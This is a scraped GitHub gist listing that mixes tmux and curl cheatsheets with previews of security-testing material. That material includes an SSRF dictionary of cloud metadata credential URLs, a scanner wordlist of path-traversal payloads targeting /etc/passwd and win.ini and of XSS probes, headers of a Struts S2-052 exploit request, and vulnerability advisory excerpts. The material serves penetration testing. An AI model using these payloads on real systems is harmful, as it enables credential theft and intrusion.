Skip to content

Instantly share code, notes, and snippets.

View pikpikcu's full-sized avatar
😊
putune simbah

PikPikcU pikpikcu

😊
putune simbah
507 followers · 133 following
View GitHub Profile
@spicycode
spicycode / tmux.conf
Created September 20, 2011 16:43
The best and greatest tmux.conf ever
# 0 is too far from ` ;)
set -g base-index 1
# Automatically set window title
set-window-option -g automatic-rename on
set-option -g set-titles on
#set -g default-terminal screen-256color
set -g status-keys vi
set -g history-limit 10000
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active November 15, 2024 09:51
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@jonschlinkert
jonschlinkert / markdown-cheatsheet.md
Last active November 4, 2024 16:00
A better markdown cheatsheet.
@subfuzion
subfuzion / curl.md
Last active November 11, 2024 03:27
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active September 30, 2024 02:53
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@pwntester
pwntester / README.md
Last active April 19, 2022 11:51
JRE8 RCE gadget
@1a57danc3
1a57danc3 / 360_website-security_scan_dic.txt
Last active June 14, 2023 06:32
360_website-security_scan_dic
/$
/%20..%5Cweb-inf
/%22%3E%3CsCrIpT%3Eprompt(42873)
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/%3Cscript%20s%3Ealert(42873)
/%3Cscript%3Ealert(42873).do
/%3f.jsp
@Malayke
Malayke / gist:43f51f9073feff7a67f847e20da4072b
Created September 6, 2017 02:15
S2-052 CVE-2017-9805 POC
POST /struts2-rest-showcase/orders/3 HTTP/1.1
Host: localhost:8080
Content-Length: 1670
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
@thomascube
thomascube / cve-2017-16651.md
Last active January 3, 2024 11:12
Roundcube Vulnerability CVE-2017-16651

Roundcube Webmail File Disclosure Vulnerability

  • Software: https://roundcube.net/
  • Versions: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2
  • CVE: CVE-2017-16651
  • Author: Thomas Bruederli
  • Release date: 2017-11-09

Summary

Roundcube Webmail allows unauthorized access to arbitrary files on the

@ChuanYuan-Huang
ChuanYuan-Huang / CVE-2018-9111 and CVE-2018-9112.md
Created May 10, 2018 01:14
CVE-2018-9111 and CVE-2018-9112 Foxconn FEMTO XSS and without Validation and Integrity Checking

CVE-2018-9111

[Suggested description] Cross Site Scripting (XSS) exists on the Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15 via the configuration of a user account. An attacker can execute arbitrary script on an unsuspecting user's browser.

[Vulnerability Type]